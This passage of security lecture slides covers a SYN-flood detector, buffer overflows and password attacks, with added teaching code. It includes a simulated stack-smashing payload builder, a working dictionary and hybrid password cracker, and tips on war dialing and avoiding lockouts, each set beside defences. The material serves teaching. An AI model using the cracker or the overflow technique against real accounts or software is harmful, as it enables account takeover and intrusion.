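
# Constructed sample: two clients completing handshakes, one source firing
# 60 SYNs in 0.6 s, and one malformed line the parser must ignore.
SAMPLE_LOG = (
    "1000.00 TCP 203.0.113.5 -> 192.0.2.10:80 SYN\n"
    "1000.05 TCP 203.0.113.5 -> 192.0.2.10:80 ACK\n"
    "1000.10 TCP 198.51.100.7 -> 192.0.2.10:80 SYN\n"
    "1000.15 TCP 198.51.100.7 -> 192.0.2.10:80 ACK\n"
    "garbage line that does not parse\n"
    + "".join(f"{1001 + i * 0.01:.2f} TCP 10.9.9.9 -> 192.0.2.10:80 SYN\n" for i in range(60))
)


class FloodDetector:
    """Sliding-window SYN counter per source address: more than `limit` SYNs
    within `window_s` seconds marks the source for blocking."""

    def __init__(self, window_s: float = 1.0, limit: int = 30):
        self.window_s, self.limit = window_s, limit
        self.recent = defaultdict(deque)   # src -> timestamps of recent SYNs
        self.blocked = set()

    def observe(self, line: str):
        m = LOG_RE.match(line.strip())
        if not m:
            return None                    # unparseable line: skip, do not crash
        ts, proto, src, _dst, _port, flags = m.groups()
        if proto != "TCP" or flags != "SYN":
            return None                    # only connection attempts count
        ts = float(ts)
        q = self.recent[src]
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()                    # expire timestamps outside the window
        if len(q) > self.limit:
            self.blocked.add(src)
        return src in self.blocked


def run_detector(log_text: str, **kwargs) -> list:
    """Feed every line to a detector and return the sorted set of sources to block."""
    det = FloodDetector(**kwargs)
    for line in log_text.splitlines():
        det.observe(line)
    return sorted(det.blocked)


def block_rules(sources) -> list:
    """Render the decisions as iptables commands (one possible enforcement point)."""
    return [f"iptables -I INPUT -s {src} -j DROP" for src in sources]


if __name__ == "__main__":
    for rule in block_rules(run_detector(SAMPLE_LOG)):
        print(rule)
```

Two caveats a practitioner would add. A SYN flood usually spoofs its source addresses, so per-source blocking catches only attackers who use their own address; against spoofed floods the answers are SYN cookies, connection-table limits and filtering upstream of the saturated link. And blocking by address hits everyone behind a shared NAT address, so the threshold should be tuned to the site's normal traffic and blocks should expire rather than stay forever. The same window counter keyed on protocol instead of source gives the per-protocol bandwidth limit mentioned on the slide.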

Buffer Overflow Attacks
How does it work?
• This attack takes advantage of the way programs store information in memory
• An attacker tries to store more information on the stack than the buffer can hold, so the excess overwrites whatever lies next to the buffer
[Diagram, Normal Stack: from bottom of memory to top of memory the frame holds Buffer 2, Local Variable 2, Buffer 1, Local Variable 1, the Return Pointer and the Function Call Arguments; the fill direction runs from bottom toward top.]
[Diagram, Smashed Stack: Buffer 2 and Local Variable 2 are intact, Buffer 1's space is overwritten with machine code that calls execve(/bin/sh), and the Return Pointer is overwritten with a new pointer to that code, so the function "returns" into the attacker's code; the Function Call Arguments sit above.]
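The two diagrams above, as an added example that is not part of the original deck: a byte-level model of the frame in which an unbounded copy into Buffer 1 runs upward through Local Variable 1 into the Return Pointer, laid out exactly as the Smashed Stack panel shows, next to a bounds-checked copy that refuses the same input. The buffer sizes, the addresses and the stand-in "shellcode" bytes are invented for illustration; a real frame also holds saved registers and padding, and the offsets have to be measured per target.

```python
"""Added example, not from the original slides: a byte-level model of the
stack frame in the diagram.  It shows an unbounded copy into Buffer 1
running upward through Local Variable 1 into the Return Pointer, and a
bounds-checked copy refusing the same input.  Sizes, addresses and the
stand-in shellcode bytes are invented for illustration; a real frame also
holds saved registers and alignment padding."""
import struct

BUF_SIZE = 32                        # Buffer 1 (assumed)
LOCAL_SIZE = 8                       # Local Variable 1 (assumed)
RET_SIZE = 8                         # Return Pointer on a 64-bit machine
RET_OFFSET = BUF_SIZE + LOCAL_SIZE   # distance from the start of Buffer 1 to the Return Pointer
FRAME_BASE = 0x7FFFFFFFE000          # assumed address of Buffer 1's first byte
SAVED_RETURN = 0x401234              # assumed legitimate return address
# Stand-in for the execve("/bin/sh") machine code of the diagram; not real code.
FAKE_SHELLCODE = b"<execve /bin/sh code>"


class StackFrame:
    """Memory grows toward higher addresses in the diagram's fill direction:
    Buffer 1, then Local Variable 1, then the Return Pointer."""

    def __init__(self, saved_return: int = SAVED_RETURN):
        self.mem = bytearray(BUF_SIZE + LOCAL_SIZE + RET_SIZE)
        self.mem[RET_OFFSET:RET_OFFSET + RET_SIZE] = struct.pack("<Q", saved_return)

    def return_pointer(self) -> int:
        return struct.unpack("<Q", self.mem[RET_OFFSET:RET_OFFSET + RET_SIZE])[0]

    def buffer1(self) -> bytes:
        return bytes(self.mem[:BUF_SIZE])

    def strcpy_like(self, src: bytes) -> None:
        """Unbounded copy in the style of strcpy(): every byte of src is
        written from the start of Buffer 1, whatever the buffer's size.
        (The model stops at the frame edge; a real copy would keep going
        into the caller's frame.)"""
        n = min(len(src), len(self.mem))
        self.mem[0:n] = src[:n]

    def bounded_copy(self, src: bytes) -> None:
        """Hardened copy: refuse input that does not fit, touching nothing."""
        if len(src) > BUF_SIZE:
            raise ValueError(f"input of {len(src)} bytes exceeds {BUF_SIZE}-byte buffer")
        self.mem[0:len(src)] = src


def build_overflow_payload(shellcode: bytes, jump_to: int = FRAME_BASE) -> bytes:
    """Lay the input out as the 'Smashed Stack' panel shows: machine code where
    Buffer 1 was, filler across the rest of the buffer and Local Variable 1,
    and the final 8 bytes landing exactly on the Return Pointer."""
    if len(shellcode) > RET_OFFSET:
        raise ValueError("shellcode does not fit below the return pointer")
    filler = b"A" * (RET_OFFSET - len(shellcode))
    return shellcode + filler + struct.pack("<Q", jump_to)


def smash_demo() -> dict:
    """Run the same oversized input through the vulnerable and hardened copies."""
    payload = build_overflow_payload(FAKE_SHELLCODE)

    victim = StackFrame()
    before = victim.return_pointer()
    victim.strcpy_like(payload)                 # overflow: 48 bytes into a 32-byte buffer

    hardened = StackFrame()
    try:
        hardened.bounded_copy(payload)
        rejected = False
    except ValueError:
        rejected = True

    return {
        "payload_len": len(payload),
        "return_before": before,
        "return_after_strcpy": victim.return_pointer(),   # now points at the buffer
        "code_in_buffer": victim.buffer1().startswith(FAKE_SHELLCODE),
        "hardened_rejected": rejected,
        "return_after_hardened": hardened.return_pointer(),
    }


if __name__ == "__main__":
    for key, value in smash_demo().items():
        print(key, hex(value) if isinstance(value, int) and not isinstance(value, bool) else value)
```

The model makes the two facts the diagram relies on concrete: the return pointer is reachable only because it sits a fixed number of bytes above the buffer in the fill direction, and the copy routine writes past the buffer only because it never consults the buffer's size. Modern compilers and operating systems add stack canaries, non-executable stacks and address randomization that each break one of those assumptions, which is why the prevention slide's "apply vendor patches" and "least privilege" still matter even when the copy itself cannot be fixed.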

Buffer Overflow Attacks
• Programs that do not rigorously check memory bounds in their code are vulnerable to this attack
• Simple weaknesses can be exploited
– If the memory allocated for a name is 50 characters, someone can break the system by sending a fictitious name of more than 50 characters
• Can be used for espionage, denial of service or compromising the integrity of data
Examples
– NetMeeting Buffer Overflow
– Outlook Buffer Overflow
– AOL Instant Messenger Buffer Overflow
– SQL Server 2000 Extended Stored Procedure Buffer Overflow

Buffer Overflow Attacks – Prevention
• Close the port or service
– Remove vulnerable software
– Remove software that is no longer being used
• Apply vendor patches
– Install patches as soon as the vendor releases them
• Filter specific traffic at the firewall
– Once a vulnerable application is identified, stop all requests to it
• Test key applications
– Test software for vulnerabilities
• Run software with the least privilege required
– Limits what the hacker can do after a successful exploit

Password Attacks
• A hacker can easily exploit weak passwords and uncontrolled network modems
• Steps
– Hacker gets the phone number of a company
– Hacker runs a war dialer program
• If the original number is 555-5532 he dials all numbers in the 555-55xx range
• When a modem answers, he records its phone number
– Hacker now needs a user ID and password to enter the company network
• Companies often have default accounts, e.g. temp or anonymous, with no password
• Often the root account uses the company name as its password
• For strong passwords, password cracking techniques exist

Password Security
• Passwords are hashed and stored
– A salt is added to randomize the hash before it is stored on the system
• Password attacks are launched to crack the stored hashes
[Diagram: the Client sends the Password to the Server; the Server combines it with the stored Salt, runs it through the Hash Function, and compares the resulting Hashed Password with the Stored Password (itself a hash); the outcome is Allow/Deny Access.]

Password Attacks – Process
• Find a valid user ID
• Create a list of possible passwords
• Rank the passwords from high probability to low
• Type in each password
• If the system lets you in: success!
• If not, try again, being careful not to exceed the password lockout (the number of wrong guesses the system allows before it locks the account and won't let you try any more)

Password Attacks – Types
• Dictionary Attack
– Hacker tries every word in a dictionary as the password
– 70% of people use dictionary words as passwords
• Brute Force Attack
– Try all combinations of the letters and symbols in the alphabet
• Hybrid Attack
– Dictionary words and their variations (e.g. appended digits, changed case, substituted characters) are tried
• Social Engineering
– People write passwords down in various places
– People naively disclose passwords to others
• Shoulder Surfing
– Hackers slyly watch over people's shoulders to steal passwords
• Dumpster Diving
– People throw papers into the trash that may contain information useful for cracking passwords
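The salted hash of the Password Security diagram and the dictionary and hybrid attacks listed above, as one added example that is not part of the original deck: the server-side hash-and-compare path, then an offline cracker that ranks each dictionary word first and its hybrid variations after it, run against constructed user records. PBKDF2-SHA256 with a deliberately low iteration count stands in for the deck's unspecified hash function so the demo runs in well under a second; the word list, the users and the suffix and substitution rules are assumptions of the example.

```python
"""Added example, not from the original slides: salted password hashing as in
the Password Security diagram, plus a dictionary/hybrid attack run offline
against the stored hashes as described under Password Attacks.  The user
records and word list are constructed; PBKDF2 with a deliberately low
iteration count stands in for the deck's unspecified hash function so the
demo runs quickly (production systems use far more iterations)."""
import hashlib
import hmac
import os

ITERATIONS = 1000  # demo value only


def hash_password(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> dict:
    """Server side of the diagram: random salt + password -> hash, store both."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "hash": digest, "iterations": iterations}


def verify_password(candidate: str, record: dict) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                                 record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["hash"])


def hybrid_candidates(word: str) -> list:
    """The dictionary word first, then the variations a hybrid attack adds:
    case changes, common suffixes and letter-for-symbol substitutions."""
    cases = [word, word.capitalize(), word.upper()]
    out = []
    for w in cases:
        out.append(w)
        for suffix in ("1", "123", "!", "2024"):       # short list for the demo
            out.append(w + suffix)
        out.append(w.replace("a", "@").replace("o", "0").replace("e", "3").replace("i", "1"))
    seen = set()
    return [c for c in out if not (c in seen or seen.add(c))]


def crack(records: dict, wordlist: list) -> dict:
    """Offline dictionary/hybrid attack.  Because every user has a distinct
    salt, each candidate must be rehashed per user; no shared lookup table."""
    found = {}
    for user, rec in records.items():
        for word in wordlist:
            hit = next((c for c in hybrid_candidates(word) if verify_password(c, rec)), None)
            if hit is not None:
                found[user] = hit
                break
    return found


def salt_makes_hashes_differ(password: str = "dragon") -> bool:
    """Two users with the same password get different stored hashes."""
    return hash_password(password)["hash"] != hash_password(password)["hash"]


# Constructed records: a plain dictionary word, a hybrid variant, and a
# passphrase that is not in the list and should survive.
WORDLIST = ["password", "letmein", "dragon", "albany", "sunshine"]
RECORDS = {
    "alice": hash_password("dragon"),
    "bob": hash_password("Albany123"),
    "carol": hash_password("correct horse battery staple"),
}

if __name__ == "__main__":
    print(crack(RECORDS, WORDLIST))
```

The salt does not stop the attack on a weak password; it only forces the attacker to redo the hashing for every user instead of once for the whole password file, which is why the iteration count (the cost of each guess) and the strength of the password itself are what decide whether carol's record survives while alice's and bob's fall. The online process on the previous slide faces the lockout counter in addition; the offline attack shown here faces no lockout at all once the hashes have been obtained.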

Conclusions
• Computer security is a continuous battle
– As computer security gets tighter, hackers get smarter
• Very high stakes
– Billions of dollars worth of business is conducted on the internet